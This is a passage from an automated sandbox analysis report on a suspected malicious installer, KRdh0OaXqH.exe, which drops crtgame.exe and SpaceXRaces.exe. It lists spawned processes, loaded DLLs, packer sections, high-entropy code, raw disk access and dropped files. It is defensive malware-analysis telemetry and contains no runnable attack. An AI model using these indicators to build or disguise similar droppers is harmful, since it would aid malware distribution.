                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /Query
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpProcess created: C:\Program Files (x86)\CRTGame\crtgame.exe "C:\Program Files (x86)\CRTGame\crtgame.exe" -i
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" helpmsg 10
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpProcess created: C:\Program Files (x86)\CRTGame\crtgame.exe "C:\Program Files (x86)\CRTGame\crtgame.exe" -s
                  Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 helpmsg 10
                  Source: C:\Users\user\Desktop\KRdh0OaXqH.exeProcess created: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp "C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp" /SL5="$10440,6991381,54272,C:\Users\user\Desktop\KRdh0OaXqH.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /QueryJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpProcess created: C:\Program Files (x86)\CRTGame\crtgame.exe "C:\Program Files (x86)\CRTGame\crtgame.exe" -iJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" helpmsg 10Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpProcess created: C:\Program Files (x86)\CRTGame\crtgame.exe "C:\Program Files (x86)\CRTGame\crtgame.exe" -sJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 helpmsg 10Jump to behavior
                  Source: C:\Users\user\Desktop\KRdh0OaXqH.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\KRdh0OaXqH.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpSection loaded: shfolder.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpSection loaded: explorerframe.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpSection loaded: sfc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: version.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: version.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpWindow found: window name: TMainFormJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: KRdh0OaXqH.exeStatic file information: File size 7246011 > 1048576
                  Source: Binary string: X:\delphi\xrecode3\src\c\DLL\visualc\libmp4v2\bin\Windows-Win32\Release\libmp4v2.pdb source: is-AE6QK.tmp.1.dr
                  Source: Binary string: D:\lame-3.100-SVN-20200409\Dll\Win32\Release NASM\lame_enc.pdb source: is-BUF5F.tmp.1.dr

                  Data Obfuscation

                  barindex
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeUnpacked PE file: 5.2.crtgame.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.hsave:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeUnpacked PE file: 5.2.crtgame.exe.400000.0.unpack
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_0044C030 LoadLibraryA,GetProcAddress,GetProcAddress,1_2_0044C030
                  Source: initial sampleStatic PE information: section where entry point is pointing to: petite
                  Source: crtgame.exe.1.drStatic PE information: section name: .hsave
                  Source: is-9AV62.tmp.1.drStatic PE information: section name: /4
                  Source: is-TF38E.tmp.1.drStatic PE information: section name: /4
                  Source: is-JN15J.tmp.1.drStatic PE information: section name: /4
                  Source: is-9OEDN.tmp.1.drStatic PE information: section name: /4
                  Source: is-9OEDN.tmp.1.drStatic PE information: section name: /19
                  Source: is-9OEDN.tmp.1.drStatic PE information: section name: /31
                  Source: is-9OEDN.tmp.1.drStatic PE information: section name: /45
                  Source: is-9OEDN.tmp.1.drStatic PE information: section name: /57
                  Source: is-9OEDN.tmp.1.drStatic PE information: section name: /70
                  Source: is-9OEDN.tmp.1.drStatic PE information: section name: /81
                  Source: is-9OEDN.tmp.1.drStatic PE information: section name: /92
                  Source: is-BUF5F.tmp.1.drStatic PE information: section name: .trace
                  Source: is-BUF5F.tmp.1.drStatic PE information: section name: _RDATA
                  Source: is-BUF5F.tmp.1.drStatic PE information: section name: .debug_o
                  Source: is-SEJ8F.tmp.1.drStatic PE information: section name: /4
                  Source: is-RDHKR.tmp.1.drStatic PE information: section name: /4
                  Source: is-8REH5.tmp.1.drStatic PE information: section name: /4
                  Source: is-72UK0.tmp.1.drStatic PE information: section name: /4
                  Source: is-UJQGJ.tmp.1.drStatic PE information: section name: /4
                  Source: is-MB554.tmp.1.drStatic PE information: section name: /4
                  Source: is-2BNI8.tmp.1.drStatic PE information: section name: /4
                  Source: is-PQ8T3.tmp.1.drStatic PE information: section name: /4
                  Source: is-R8DJL.tmp.1.drStatic PE information: section name: /4
                  Source: is-V3CB3.tmp.1.drStatic PE information: section name:
                  Source: is-V3CB3.tmp.1.drStatic PE information: section name:
                  Source: is-V3CB3.tmp.1.drStatic PE information: section name: petite
                  Source: is-ENF4U.tmp.1.drStatic PE information: section name: /4
                  Source: is-82P0C.tmp.1.drStatic PE information: section name:
                  Source: is-82P0C.tmp.1.drStatic PE information: section name:
                  Source: is-82P0C.tmp.1.drStatic PE information: section name: petite
                  Source: is-SG9N2.tmp.1.drStatic PE information: section name:
                  Source: is-SG9N2.tmp.1.drStatic PE information: section name:
                  Source: is-SG9N2.tmp.1.drStatic PE information: section name: petite
                  Source: is-9QS5M.tmp.1.drStatic PE information: section name:
                  Source: is-9QS5M.tmp.1.drStatic PE information: section name: petite
                  Source: is-0NR14.tmp.1.drStatic PE information: section name:
                  Source: is-0NR14.tmp.1.drStatic PE information: section name:
                  Source: is-0NR14.tmp.1.drStatic PE information: section name: petite
                  Source: is-4IVEL.tmp.1.drStatic PE information: section name: /4
                  Source: is-1V1KO.tmp.1.drStatic PE information: section name: .sxdata
                  Source: is-2Q15C.tmp.1.drStatic PE information: section name: .didata
                  Source: is-HBA5G.tmp.1.drStatic PE information: section name:
                  Source: is-HBA5G.tmp.1.drStatic PE information: section name:
                  Source: is-HBA5G.tmp.1.drStatic PE information: section name: petite
                  Source: is-UT63K.tmp.1.drStatic PE information: section name:
                  Source: is-UT63K.tmp.1.drStatic PE information: section name: petite
                  Source: is-3PB3G.tmp.1.drStatic PE information: section name:
                  Source: is-3PB3G.tmp.1.drStatic PE information: section name:
                  Source: is-3PB3G.tmp.1.drStatic PE information: section name:
                  Source: is-O5AH5.tmp.1.drStatic PE information: section name:
                  Source: is-O5AH5.tmp.1.drStatic PE information: section name:
                  Source: is-O5AH5.tmp.1.drStatic PE information: section name: petite
                  Source: is-2JFSM.tmp.1.drStatic PE information: section name:
                  Source: is-2JFSM.tmp.1.drStatic PE information: section name:
                  Source: is-2JFSM.tmp.1.drStatic PE information: section name:
                  Source: is-H4RQI.tmp.1.drStatic PE information: section name:
                  Source: is-H4RQI.tmp.1.drStatic PE information: section name:
                  Source: is-H4RQI.tmp.1.drStatic PE information: section name: petite
                  Source: is-MSL58.tmp.1.drStatic PE information: section name:
                  Source: is-MSL58.tmp.1.drStatic PE information: section name:
                  Source: is-MSL58.tmp.1.drStatic PE information: section name: petite
                  Source: is-BLG4U.tmp.1.drStatic PE information: section name:
                  Source: is-BLG4U.tmp.1.drStatic PE information: section name:
                  Source: is-BLG4U.tmp.1.drStatic PE information: section name:
                  Source: is-MDCMM.tmp.1.drStatic PE information: section name:
                  Source: is-MDCMM.tmp.1.drStatic PE information: section name:
                  Source: is-MDCMM.tmp.1.drStatic PE information: section name: petite
                  Source: is-C09DN.tmp.1.drStatic PE information: section name: /4
                  Source: is-5CFA9.tmp.1.drStatic PE information: section name: /4
                  Source: is-CJ9O9.tmp.1.drStatic PE information: section name: /4
                  Source: is-PKSJK.tmp.1.drStatic PE information: section name: /4
                  Source: is-DC7IR.tmp.1.drStatic PE information: section name:
                  Source: is-DC7IR.tmp.1.drStatic PE information: section name:
                  Source: is-DC7IR.tmp.1.drStatic PE information: section name:
                  Source: is-H36N8.tmp.1.drStatic PE information: section name: /4
                  Source: is-TDV1O.tmp.1.drStatic PE information: section name: .eh_fram
                  Source: is-UP2KF.tmp.1.drStatic PE information: section name: asmcode
                  Source: is-41E97.tmp.1.drStatic PE information: section name: .eh_fram
                  Source: is-RUH59.tmp.1.drStatic PE information: section name: /4
                  Source: is-8CIMQ.tmp.1.drStatic PE information: section name: /4
                  Source: is-RF28Q.tmp.1.drStatic PE information: section name: /4
                  Source: SpaceXRaces.exe.5.drStatic PE information: section name: .hsave
                  Source: C:\Users\user\Desktop\KRdh0OaXqH.exeCode function: 0_2_004065B8 push 004065F5h; ret 0_2_004065ED
                  Source: C:\Users\user\Desktop\KRdh0OaXqH.exeCode function: 0_2_004040B5 push eax; ret 0_2_004040F1
                  Source: C:\Users\user\Desktop\KRdh0OaXqH.exeCode function: 0_2_00408104 push ecx; mov dword ptr [esp], eax0_2_00408109
                  Source: C:\Users\user\Desktop\KRdh0OaXqH.exeCode function: 0_2_00404185 push 00404391h; ret 0_2_00404389
                  Source: C:\Users\user\Desktop\KRdh0OaXqH.exeCode function: 0_2_00404206 push 00404391h; ret 0_2_00404389
                  Source: C:\Users\user\Desktop\KRdh0OaXqH.exeCode function: 0_2_0040C218 push eax; ret 0_2_0040C219
                  Source: C:\Users\user\Desktop\KRdh0OaXqH.exeCode function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
                  Source: C:\Users\user\Desktop\KRdh0OaXqH.exeCode function: 0_2_00404283 push 00404391h; ret 0_2_00404389
                  Source: C:\Users\user\Desktop\KRdh0OaXqH.exeCode function: 0_2_00408F38 push 00408F6Bh; ret 0_2_00408F63
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_00409954 push 00409991h; ret 1_2_00409989
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_0040A04F push ds; ret 1_2_0040A050
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_0040A023 push ds; ret 1_2_0040A04D
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_004062CC push ecx; mov dword ptr [esp], eax1_2_004062CD
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_004822F4 push 004823D2h; ret 1_2_004823CA
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_004765B0 push ecx; mov dword ptr [esp], edx1_2_004765B1
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_004106E0 push ecx; mov dword ptr [esp], edx1_2_004106E5
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_00412938 push 0041299Bh; ret 1_2_00412993
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_004589F0 push 00458A34h; ret 1_2_00458A2C
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_00442C94 push ecx; mov dword ptr [esp], ecx1_2_00442C98
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_00450E58 push 00450E8Bh; ret 1_2_00450E83
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_0045101C push ecx; mov dword ptr [esp], eax1_2_00451021
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_0040D038 push ecx; mov dword ptr [esp], edx1_2_0040D03A
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_0049310C push ecx; mov dword ptr [esp], ecx1_2_00493111
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_004571B0 push 004571E8h; ret 1_2_004571E0
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_0045F444 push ecx; mov dword ptr [esp], ecx1_2_0045F448
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_0040546D push eax; ret 1_2_004054A9
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_0040553D push 00405749h; ret 1_2_00405741
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_0040F598 push ecx; mov dword ptr [esp], edx1_2_0040F59A
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_004055BE push 00405749h; ret 1_2_00405741
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_0040563B push 00405749h; ret 1_2_00405741
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpCode function: 1_2_004056A0 push 00405749h; ret 1_2_00405741
                  Source: crtgame.exe.1.drStatic PE information: section name: .text entropy: 7.600836004242041
                  Source: is-3PB3G.tmp.1.drStatic PE information: section name: entropy: 7.953893773659523
                  Source: is-2JFSM.tmp.1.drStatic PE information: section name: entropy: 7.921519965168042
                  Source: is-MSL58.tmp.1.drStatic PE information: section name: entropy: 7.966771808365004
                  Source: is-BLG4U.tmp.1.drStatic PE information: section name: entropy: 7.950928332152424
                  Source: is-DC7IR.tmp.1.drStatic PE information: section name: entropy: 7.491817342209834
                  Source: SpaceXRaces.exe.5.drStatic PE information: section name: .text entropy: 7.600836004242041

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive05_2_00401A58
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive07_2_02A3F29C
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-2JFSM.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\daiso.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-H4RQI.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\basswma.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-SG9N2.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassmidi.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\takdec.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-TF38E.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\avfilter-9.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\lame_enc.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Users\user\AppData\Local\Temp\is-2DP67.tmp\_isetup\_RegDLL.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-MSL58.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-72UK0.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-I2830.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-DC7IR.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-C09DN.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-BUF5F.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\dsd2.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-O5AH5.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\d_writer.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-M699B.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-RDHKR.tmpJump to dropped file
                  Source: C:\Users\user\Desktop\KRdh0OaXqH.exeFile created: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpJump to dropped file
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile created: C:\ProgramData\SpaceXRaces\SpaceXRaces.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-8REH5.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-UP2KF.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Users\user\AppData\Local\Temp\is-2DP67.tmp\_isetup\_shfoldr.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\avutil-58.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-FL34R.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-UJQGJ.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\sd.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\rg_ebur128.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassdsd.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-5CFA9.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-2Q15C.tmpJump to dropped file
